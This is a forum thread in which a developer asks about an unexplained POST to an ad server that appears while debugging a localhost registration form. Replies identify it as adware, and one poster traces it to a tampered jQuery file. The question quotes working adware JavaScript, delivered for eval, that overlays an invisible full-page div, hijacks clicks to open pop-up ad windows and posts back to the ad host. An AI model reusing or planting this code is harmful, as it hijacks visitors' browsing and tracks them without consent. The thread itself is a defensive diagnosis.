I am have debugging some javascript code in firebug,then i have seen some strange POST thing in firebug this is worrying me?
I have registration form when i reload page i see in firebug following "POST http://api.adsrun.net/post"[b]
Response Header
Cache-Control
no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection
keep-alive
Content-Type
application/json
Date
Mon, 09 Nov 2015 13:25:43 GMT
Expires
Thu, 19 Nov 1981 08:52:00 GMT
Pragma
no-cache
Server
nginx/1.9.4
Set-Cookie
PHPSESSID=a0f52694494daab764d719b907baff6b; expires=Sat, 07-Nov-2020 13:25:43 GMT; Max-Age=157680000
; path=/
Transfer-Encoding
chunked
access-control-allow-cred...
true
access-control-allow-head...
Content-Type
access-control-allow-orig...
http://localhost
p3p
CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"[/b]
RESPONSE is something like this
{"eval":"\nvar ad = response.ad;\nvar ad_token = response.ad_token;\nfunction postAction(xlog, cb) {
\n var params = {\"ad_id\":14,\"show_id\":27,\"user_id\":1573819,\"host\":\"localhost\",\"time\":1447075543
,\"hash\":\"6dd0fd2392c7a0cc9800ccfcea9143ed\"};\n params.postActionParams = xlog;\n ajax(\"http:\
/\/api.adsrun.net\/postAction\", params, cb);\n}\nvar ontw = false;\r\nfunction oNT() {\r\n if (ontw
) return;\r\n else ontw = true;\r\n var b = window.open(ad.url, \"new\" + Math.floor(9999999 *
Math.random()) + 1);\r\n if (b) postAction(); \r\n\r\n\/\/ var e = navigator.userAgent.toLowerCase
(),o = -1 != e.indexOf(\"opera\"),g = -1 != e.indexOf(\"chrome\");\r\n\r\n \/\/ if (document.createEvent
&& (o || g)) {\r\n \/\/ if (false) {\r\n \/\/ var b = document.createElement(\"a\");\r\n
\/\/ b.href = ad.url;\r\n \/\/ b.target = \"_blank\";\r\n \/\/ var c = document.createEvent
(\"MouseEvents\");\r\n \/\/ c.initMouseEvent(\"click\", !0, !0, window, 1, 0, 0, 0, 0, !0, !1,
!1, !1, 1, null);\r\n \/\/ b.dispatchEvent(c);\r\n \/\/ postAction();\r\n \/\/ } \r\n
\/\/ else {\r\n \/\/ var b = window.open(\"about:blank\", \"win\" + Math.floor(9999999 * Math
.random()) + 1);\r\n \/\/ with(b) opener.window.focus(), b.location = ad.url, \"undefined\" !=
typeof window.mozPaintCount && window.open(\"about:blank\").close()\r\n \/\/ if (b) postAction
(); \r\n \/\/ }\r\n \r\n\r\n}\r\n\r\n\r\n\r\n var startTimeout = setTimeout(myStart, 100),divret
= null;\r\nif (\"function\" == typeof window.addEventListener) window.addEventListener(\"load\", function
() {\r\n clearInterval(startTimeout);\r\n myStart()\r\n}, !1);\r\nelse try {\r\n window.attachEvent
(\"onload\", function() {\r\n clearInterval(startTimeout);\r\n myStart()\r\n })\r\n} catch
(D) {}\r\n\r\nfunction myStart() { \r\n\r\n var pdiv = document.createElement('div');\r\n
pdiv.style.position = \"fixed\";\r\n pdiv.style.zIndex = \"2147483647\";\r\n pdiv.style
.width = \"100%\";\r\n pdiv.style.height = \"100%\";\r\n pdiv.style.left = \"0px\";\r\n
pdiv.style.top = \"0px\";\r\n pdiv.onclick = function() {\r\n oNT();\r\n document
.body.removeChild(pdiv);\r\n }\r\n if (!divret) {divret=document.body.appendChild(pdiv);}\r
\n document.addEventListener ? document.addEventListener(\"mouseup\", oNT, !1) : document.attachEvent
(\"onmouseup\", oNT);\r\n \r\n}","ad":{"url":"http:\/\/www.adcash.com\/ad\/display.php?r=356017"
},"ad_token":"31f68d20ffc59b05601acfa0dc349e4b14"}
I am not sure this some malware type may be harmful??I have encountered this problem from 2 days looks strange to me and need your suggestions?
JSON :
[text]var ad = response.ad;
var ad_token = response.ad_token;
function postAction(xlog, cb) {
var params = {"ad_id":14,"show_id":27,"user_id":1573819,"host":"localhost","time":1447075543,"hash":"6dd0fd2392c7a0cc9800ccfcea9143ed"};
params.postActionParams = xlog;
ajax("http://api.adsrun.net/postAction", params, cb);
}
var ontw = false;
function oNT() {
if (ontw) return;
else ontw = true;
var b = window.open(ad.url, "new" + Math.floor(9999999 * Math.random()) + 1);
if (b) postAction();
// var e = navigator.userAgent.toLowerCase(),o = -1 != e.indexOf("opera"),g = -1 != e.indexOf("chrome");
// if (document.createEvent && (o || g)) {
// if (false) {
[/text]
unknown POST api.adsrun.net/post" on localhost?
Moderator: General Moderators
-
ershadow786
- Forum Newbie
- Posts: 2
- Joined: Mon Nov 09, 2015 7:31 am
Re: unknown POST api.adsrun.net/post" on localhost?
adsrun.net is a domain used by some kind of proxy/filter/etc. bypassing stuff. Do you have an extension installed that has anything to do with that? What <script> or Javascript code is triggering the call?
-
ershadow786
- Forum Newbie
- Posts: 2
- Joined: Mon Nov 09, 2015 7:31 am
Re: unknown POST api.adsrun.net/post" on localhost?
thanks for reply:
i am not sure which javascript code is triggering that call[http://api.adsrun.net/post] but after looking at JSON there is key url whose url " "http://www.newpoptab.com/watch?key=60fd ... 056f84047d" " this changed after restart and before that it was tradeadexchange.after googleing i found that they were ad ware malware.I tried antivirus avg but none could remove however spyhunter could detect that but for removing it requires paid version
.Any help appreciated
i am not sure which javascript code is triggering that call[http://api.adsrun.net/post] but after looking at JSON there is key url whose url " "http://www.newpoptab.com/watch?key=60fd ... 056f84047d" " this changed after restart and before that it was tradeadexchange.after googleing i found that they were ad ware malware.I tried antivirus avg but none could remove however spyhunter could detect that but for removing it requires paid version
.Any help appreciatedRe: unknown POST api.adsrun.net/post" on localhost?
Yeah, that could certainly explain it.
I normally clean computers by hand so I can't point you to any good anti-malware stuff. I think HijackThis is still around, but it takes a bit of know-how regarding what it reports and what should be cleaned. Microsoft has a free antivirus too. Don't remember what it's called.
Also check the most obvious place: list of programs installed in Windows. Some of the nicer malware actually lets you uninstall it.
I normally clean computers by hand so I can't point you to any good anti-malware stuff. I think HijackThis is still around, but it takes a bit of know-how regarding what it reports and what should be cleaned. Microsoft has a free antivirus too. Don't remember what it's called.
Also check the most obvious place: list of programs installed in Windows. Some of the nicer malware actually lets you uninstall it.
Re: unknown POST api.adsrun.net/post" on localhost?
Do you mean Microsoft Security Essentials? I haven't used Windows in years, so that may not be current.requinix wrote:Microsoft has a free antivirus too. Don't remember what it's called.
Re: unknown POST api.adsrun.net/post" on localhost?
Yeah. There's also a somethingorother Endpoint Protection which is basically the business version. They're consistently not rated very highly, but they doesn't cripple the computer like some other free AV programs do.Celauran wrote:Do you mean Microsoft Security Essentials? I haven't used Windows in years, so that may not be current.requinix wrote:Microsoft has a free antivirus too. Don't remember what it's called.
Re: unknown POST api.adsrun.net/post" on localhost?
I found this thread looking for information. I got the same issue, and I found where it came from.
In our website site project, a colleague included the file "jquery-2.2.0.min.js", but that had been hacked with a short on load window listener function. That function was querying a website to get spam content.
In our website site project, a colleague included the file "jquery-2.2.0.min.js", but that had been hacked with a short on load window listener function. That function was querying a website to get spam content.